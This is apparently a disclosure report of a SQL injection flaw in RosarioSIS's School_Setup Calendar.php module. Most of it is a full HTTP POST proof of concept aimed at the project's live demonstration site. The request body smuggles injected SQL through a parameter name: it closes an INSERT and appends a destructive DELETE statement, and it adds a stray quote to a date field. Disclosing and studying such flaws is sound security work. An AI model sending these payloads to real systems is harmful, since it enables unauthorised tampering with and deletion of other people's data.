Description

In Calendar.php line 498-513, web server get values parameter as a part of sql query without sanitize, so attacker can be manipulated sql query, which is executed by web server https://github.com/francoisjacquet/rosariosis/blob/51947b6cfc7f0df62ab3305839c89586004fbec2/modules/School_Setup/Calendar.php#L498

Proof of Concept

POST /demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&event_id=new&month=04&year=2022 HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=ls2p6bohdqumdr8oecokk4j3bp8e79vs3mrhkgn37905r7i2phi0
Content-Length: 205
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.rosariosis.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&year=2022&month=04&school_date=2022-04-04&event_id=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8,no;q=0.7
Connection: close

month_values[SCHOOL_DATE]=04&day_values[SCHOOL_DATE]=04&year_values[SCHOOL_DATE]=202'2&REPEAT=1&values[DESCRIPTION) values (23,"2021","1",NULL);DELETE *FROM ;--][TITLE]=123&values[DESCRIPTION]=&button=Save